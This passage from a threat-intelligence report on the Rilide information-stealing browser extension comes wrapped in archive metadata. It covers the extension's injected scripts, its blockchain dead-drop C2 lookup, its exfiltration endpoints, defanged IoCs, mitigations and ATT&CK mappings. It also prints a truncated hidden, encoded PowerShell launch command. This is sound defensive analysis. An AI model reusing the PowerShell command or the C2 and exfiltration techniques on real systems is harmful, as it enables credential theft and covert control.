writing\r\ncapabilities. The service worker is a file called ToggleTest.js. The extension injects three scripts into every webpage,\r\ncollecting information from the pages. The scripts are:\r\nOpenRemove.js\r\nAlertReceive.js\r\nRelease.js  \r\nFigure 28: Content of the manifest.json file\r\nFigure 29: The manifest.json file shows the injected scripts and declarative_net_request specifications.\r\n💡\r\nhttps://blog.pulsedive.com/rilide-an-information-stealing-browser-extension/\r\nPage 20 of 31\n\nFor more information about how Browser Extensions work, please read our\r\nblog\r\n.\r\nThe rules.json is specified as part of the declarative_net_request objects, an API that blocks or modifies web requests. In\r\nthis case, the API adjusts the content security policy to help remove headers.\r\nrules.json\r\nFigure 30: The rules declared within the rules.json that are used to remove content security policies. \r\nThe rules.json file is used to modify headers in network requests and removes any content security policy values set by the\r\nweb pages. \r\nconfig.js\r\nFigure 31: Configuration parameters for Rilide, including the ability to set up a Telegram C2 channel.\r\nThe config file contains references to Telegram and Web-based panels. However, this sample does not appear to have a\r\nTelegram panel, as shown by the lack of details within the TelegramPanel object. \r\nToggleTest.js\r\nToggleTest.js is a heavily obfuscated file that imports functions from other JavaScript files. The file call functions to collect\r\nsystem information, execute commands, and take screenshots.\r\nhttps://blog.pulsedive.com/rilide-an-information-stealing-browser-extension/\r\nPage 21 of 31\n\nFigure 32: Functions imported by the service worker, ToggleTest.js, to expand its functionality. \r\nOpenReceive.js\r\nThis file was heavily obfuscated and used event listeners to collect messages from cryptocurrency exchanges and other\r\nwebsites, such as Facebook and Google Pay. Before grabbing information, the malware checks local storage in the web\r\nbrowser to obtain settings used to gather what information Rilide collects.\r\nhttps://blog.pulsedive.com/rilide-an-information-stealing-browser-extension/\r\nPage 22 of 31\n\nFigure 33: Code used to create event listeners that look for cryptocurrency details.\r\nAlertReceive.js\r\nThe AlertReceive.js file is used to read and write text from the clipboard. \r\nFigure 34: Code used to interact with the clipboard.\r\nRelease.js\r\nThis file collects content from email applications. The injected code checks whether the web page is Outlook, Yahoo, or\r\nGmail. Once the email application has been identified, the script examines the DOM content on the web page to collect\r\ninformation about the emails. \r\nFigure 35: Deobfuscated code from Release.js that looks for Outlook, Yahoo, and Gmail pages.\r\nhttps://blog.pulsedive.com/rilide-an-information-stealing-browser-extension/\r\nPage 23 of 31\n\nResearch from Trellix outlines that Rilide looks for messages from cryptocurrency exchanges and modifies their content to\r\ncollect credentials from users when they attempt to log in to the exchange. \r\nFigure 36: Notes from Trellix indicate that Rilide modified emails to lure users into signing into their\r\ncryptocurrency accounts. Source: Trellix\r\nNetwork Traffic\r\n💡\r\nA packet capture of Rilide network traffic and SSL decryption keys are provided as a reference.\r\nC2 Resolution using Dead Drops\r\nRilide queries different blockchain services to obtain the C2 server, which is stored as a base58-encoded value in another\r\ncryptocurrency address. The blockchain services queried include:\r\nBlockstream\r\nBitcoin Explorer\r\nBlockcypher\r\nMempool\r\nBitcore\r\nThe Bitcoin address that the malware looks up is bc1qkljhfktumxjqa52yle0xzz9nd4jl40vzyyc066.\r\nFigure 37: Cryptocurrency transaction to the BitCoin address the malware looks up. Source: Blockchain.com\r\nhttps://blog.pulsedive.com/rilide-an-information-stealing-browser-extension/\r\nPage 24 of 31\n\nFigure 38: Requests to blockstream.info that return another BitCoin address that also doubles as the C2\r\naddress for the malware. \r\nFigure 38: Requests to Blockcypher showing the second BitCoin address.\r\nThe address is 1Aybhtfb3TM36MDmULVXJVAFni8V8tR4aS and decodes to the C2 server memento-mori[.]com\r\nhttps://blog.pulsedive.com/rilide-an-information-stealing-browser-extension/\r\nPage 25 of 31\n\nFigure 39: The second BitCoin address can be decoded into the C2 domain using base58.\r\nC2 Communication\r\nOnce the C2 server has been identified, the extension starts exfiltrating information back to it. The malware returns system\r\ninformation data to the C2 server via a POST request to the URI /api/machine/init .\r\nFigure 40: System information exfiltrated by Rilide.\r\nThe information includes:\r\nCPU details\r\nOperating System information\r\nDisplay information\r\nExtension details\r\nOther commands observed within network traffic include:\r\n/api/machine/injections\r\n/api/machine/commands\r\nhttps://blog.pulsedive.com/rilide-an-information-stealing-browser-extension/\r\nPage 26 of 31\n\n/api/machine/settings\r\n/api/machine/clipper\r\n/api/machine/screenshot-rules\r\n/api/machine/set-command\r\nFigure 41: Phases returned by the C2 used to determine what information Rilide targets. This command also\r\nreturns a reverse proxy address if the malware uses one.\r\nMitigations\r\nExtension Management\r\nAvoid installing extensions from untrusted sources or third-party websites.\r\nWhile using Browser Extensions Stores significantly reduces the risk of downloading malicious\r\nextensions, it does not eliminate the risk. Our blog, Compromised Browser Extensions - A Growing\r\nThreat Vector, highlights compromised extensions on the Chrome Store.\r\nUsers should review permissions used by extensions before installing them.\r\nUsers should periodically review installed extensions to identify any that are no longer needed and remove\r\nthem.\r\nPowerShell Logging\r\nEnable PowerShell logging features, including:\r\nModule Logging\r\nScript Block logging\r\nHave PowerShell logs being ingested into SIEM or centralized log management solutions for monitoring\r\nBlock users from running PowerShell Commands\r\nRestrict PowerShell usage to only those that are required to run PowerShell commands.\r\nIndicators of Compromise\r\nThe table below contains all Rilide network IoCs identified during the analysis of the intrusion chain. \r\nIOCs\r\nhttps://blog.pulsedive.com/rilide-an-information-stealing-browser-extension/\r\nPage 27 of 31\n\nhxxps[://]blockstream[.]info/api/address/bc1qkljhfktumxjqa52yle0xzz9nd4jl40vzyyc066/txs\r\nhxxps[://]bitcoinexplorer[.]org/api/address/bc1qkljhfktumxjqa52yle0xzz9nd4jl40vzyyc066?limit=1\r\nhxxps[://]api[.]blockcypher[.]com/v1/btc/main/addrs/bc1qkljhfktumxjqa52yle0xzz9nd4jl40vzyyc066/full?limit=1\r\nhxxps[://]mempool[.]space/api/address/bc1qkljhfktumxjqa52yle0xzz9nd4jl40vzyyc066/txs\r\nhxxps[://]api[.]bitcore[.]io/api/BTC/mainnet/address/bc1qkljhfktumxjqa52yle0xzz9nd4jl40vzyyc066/txs?limit=1\r\nhxxps[://]mmemento-mori[.]com/api/machine/sign?d=mmemento-mori[.]com\r\nhxxps[://]mmemento-mori[.]com/api/machine/init\r\nhxxps[://]mmemento-mori[.]com/api/machine/injections?uuid=31d7f9d7-a0ea-46be-88b7-196bc3e2e5e1\r\nhxxps[://]mmemento-mori[.]com/api/machine/commands?uuid=31d7f9d7-a0ea-46be-88b7-196bc3e2e5e1\r\nhxxps[://]mmemento-mori[.]com/api/machine/settings\r\nhxxps[://]mmemento-mori[.]com/api/machine/clipper\r\nhxxps[://]mmemento-mori[.]com/api/machine/screenshot-rules\r\nhxxps[://]mmemento-mori[.]com/api/machine/set-command\r\nhxxps[://]tcl-black[.]com/1111[.]bs64\r\ntcl-black[.]com\r\nThe table below contains a subset of additional Rilide network IoCs that have been added to the Pulsedive platform. This\r\ndata can be queried in Pulsedive using the Explore query threat=Rilide and is available for export in multiple formats (CSV,\r\nSTIX 2.1, JSON).\r\nIOCs\r\nashgrrwt[.]click\r\nhttps://blog.pulsedive.com/rilide-an-information-stealing-browser-extension/\r\nPage 28 of 31\n\nnch-software[.]info\r\nnvidia-graphics[.]top\r\nvceilinichego[.]ru\r\n45[.]15[.]156[.]210\r\nweb-lox[.]com\r\nassets[.]bnbcoinstatic[.]com\r\nproyectopatentadomxapostol[.]com\r\nblackfox[.]lol\r\npupkalazalupka[.]com\r\nextension-login[.]com\r\ntes123123t[.]com\r\nextensionsupdate[.]com\r\nhxxps[:=//]download[.]hdoki[.]org/yzxdhdxsqkmvcayrtevs/RiotRevelry1[.]0[.]2[.]exe\r\nhxxps[:=//]nch-software[.]info/1/2[.]exe\r\nnightpredators[.]com\r\nRilide MITRE ATT\u0026CK TTPs\r\nTechnique Tactic\r\nCollection Clipboard data (T1115)\r\nEmail Collection (T1114)\r\nhttps://blog.pulsedive.com/rilide-an-information-stealing-browser-extension/\r\nPage 29 of 31\n\nScreen Capture (T1113)\r\nCommand and Control\r\nApplication Layer Protocol: Web Protocols (T1071.001)\r\nDynamic Resolution (T1568)\r\nWeb Service: Dead Drop Resolver (T1102.001)\r\nProxy: External Proxy (T1090.002)\r\nIngress Tool Transfer (T1105)\r\nCredential Access\r\nClipboard data (T1115)\r\nSteal Web Session Cookie (T1539)\r\nDefense Evasion\r\nAccess Token Manipulation (T1134)\r\nDeobfuscate/Decode Files or Information (T1140)\r\nMasquerading (T1036)\r\nObfuscated Files or Information (T1027)\r\nProcess Injection (T1055)\r\nVirtualization/Sandbox Evasion: User Activity Based Checks (T1497.002)\r\nDiscovery\r\nSystem Information Discovery (T1082)\r\nVirtualization/Sandbox Evasion: User Activity Based Checks (T1497.002)\r\nEvasion Masquerading (T1036)\r\nExecution Command and Scripting Interpreter: PowerShell (T1059.001)\r\nCommand and Scripting Interpreter: JavaScript (T1059.007)\r\nhttps://blog.pulsedive.com/rilide-an-information-stealing-browser-extension/\r\nPage 30 of 31\n\nUser Execution: Malicious File (T1204.002)\r\nInitial Access Phishing (T1566)\r\nPersistence\r\nBoot or Logon Autostart Execution (T1547)\r\nBrowser Extensions (T1176)\r\nPrivilege Escalation\r\nAccess Token Manipulation (T1134)\r\nBoot or Logon Autostart Execution (T1547)\r\nProcess Injection: Process Hollowing (T1055.012)\r\nReferences\r\nhttps://developer.chrome.com/docs/extensions/develop/migrate\r\nhttps://thehackernews.com/2023/08/new-version-of-rilide-data-theft.html\r\nhttps://x.com/vmray/status/1862414695002501223\r\nhttps://www.vmray.com/analyses/76afc4a7ef10/report/overview.html\r\nhttps://www.virustotal.com/gui/file/76afc4a7ef10d760c3fa42458e8f133f1ed4d76071ab6f4207037f64a4bffab7/detection\r\nhttps://urlscan.io/result/08eff9cb-4431-4fc9-b957-0733a5391e5e/\r\nhttps://www.trustwave.com/en-us/resources/blogs/spiderlabs-blog/rilide-a-new-malicious-browser-extension-for-stealing-cryptocurrencies/\r\nhttps://www.trellix.com/en-in/blogs/research/genesis-market-no-longer-feeds-the-evil-cookie-monster/ \r\nhttps://www.exabeam.com/blog/security-operations-center/powershell-and-command-line-logging-with-logrhythm/\r\nAppendix 1 - PowerShell Script\r\n\"C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\powershell.exe\" -windowstyle hidden -e JABsAFUAaABwAEoAIAA9ACAAKAAiAGsAcABDAD\r\nSource: https://blog.pulsedive.com/rilide-an-information-stealing-browser-extension/\r\nhttps://blog.pulsedive.com/rilide-an-information-stealing-browser-extension/\r\nPage 31 of 31", "extraction_quality": 1, "language": "EN", "sources": [ "MITRE" ], "origins": [ "web" ], "references": [ "https://blog.pulsedive.com/rilide-an-information-stealing-browser-extension/" ], "report_names": [ "rilide-an-information-stealing-browser-extension" ], "threat_actors": [ { "id": "9f101d9c-05ea-48b9-b6f1-168cd6d06d12", "created_at": "2023-01-06T13:46:39.396409Z", "updated_at": "2026-04-10T02:00:03.312816Z", "deleted_at": null, "main_name": "Earth Lusca", "aliases": [ "CHROMIUM", "ControlX", "TAG-22", "BRONZE UNIVERSITY", "AQUATIC PANDA", "RedHotel", "Charcoal Typhoon", "Red Scylla", "Red Dev 10", "BountyGlad" ], "source_name": "MISPGALAXY:Earth Lusca", "tools": [ "RouterGod", "SprySOCKS", "ShadowPad", "POISONPLUG", "Barlaiy", "Spyder", "FunnySwitch" ], "source_id": "MISPGALAXY", "reports": null }, { "id": "18a7b52d-a1cd-43a3-8982-7324e3e676b7", "created_at": "2025-08-07T02:03:24.688416Z", "updated_at": "2026-04-10T02:00:03.734754Z", "deleted_at": null, "main_name": "BRONZE UNIVERSITY", "aliases": [ "Aquatic Panda", "Aquatic Panda ", "CHROMIUM", "CHROMIUM ", "Charcoal Typhoon", "Charcoal Typhoon ", "Earth Lusca", "Earth Lusca ", "FISHMONGER ", "Red Dev 10", "Red Dev 10 ", "Red Scylla", "Red Scylla ", "RedHotel", "RedHotel ", "Tag-22", "Tag-22 " ], "source_name": "Secureworks:BRONZE UNIVERSITY", "tools": [ "Cobalt Strike", "Fishmaster", "FunnySwitch", "Spyder", "njRAT" ], "source_id": "Secureworks", "reports": null }, { "id": "6abcc917-035c-4e9b-a53f-eaee636749c3", "created_at": "2022-10-25T16:07:23.565337Z", "updated_at": "2026-04-10T02:00:04.668393Z", "deleted_at": null, "main_name": "Earth Lusca", "aliases": [ "Bronze University", "Charcoal Typhoon", "Chromium", "G1006", "Red Dev 10", "Red Scylla" ], "source_name": "ETDA:Earth Lusca", "tools": [ "Agentemis", "AntSword", "BIOPASS", "BIOPASS RAT", "BadPotato", "Behinder", "BleDoor", "Cobalt Strike", "CobaltStrike", "Doraemon", "FRP", "Fast Reverse Proxy", "FunnySwitch", "HUC Port Banner Scanner", "KTLVdoor", "Mimikatz", "NBTscan", "POISONPLUG.SHADOW", "PipeMon", "RbDoor", "RibDoor", "RouterGod", "SAMRID", "ShadowPad Winnti", "SprySOCKS", "WinRAR", "Winnti", "XShellGhost", "cobeacon", "fscan", "lcx", "nbtscan" ], "source_id": "ETDA", "reports": null }, { "id": "d53593c3-2819-4af3-bf16-0c39edc64920", "created_at": "2022-10-27T08:27:13.212301Z", "updated_at": "2026-04-10T02:00:05.272802Z", "deleted_at": null, "main_name": "Earth Lusca", "aliases": [ "Earth Lusca", "TAG-22", "Charcoal Typhoon", "CHROMIUM", "ControlX" ], "source_name": "MITRE:Earth Lusca", "tools": [ "Mimikatz", "PowerSploit", "Tasklist", "certutil", "Cobalt Strike", "Winnti for Linux", "Nltest", "NBTscan", "ShadowPad" ], "source_id": "MITRE", "reports": null } ], "ts_created_at": 1775434778, "ts_updated_at": 1775826742, "ts_creation_date": 0, "ts_modification_date": 0, "files": { "pdf": "https://archive.orkl.eu/3e9238447cfc59691cf3c3c66304f3085ed342fb.pdf", "text": "https://archive.orkl.eu/3e9238447cfc59691cf3c3c66304f3085ed342fb.txt", "img": "https://archive.orkl.eu/3e9238447cfc59691cf3c3c66304f3085ed342fb.jpg" } }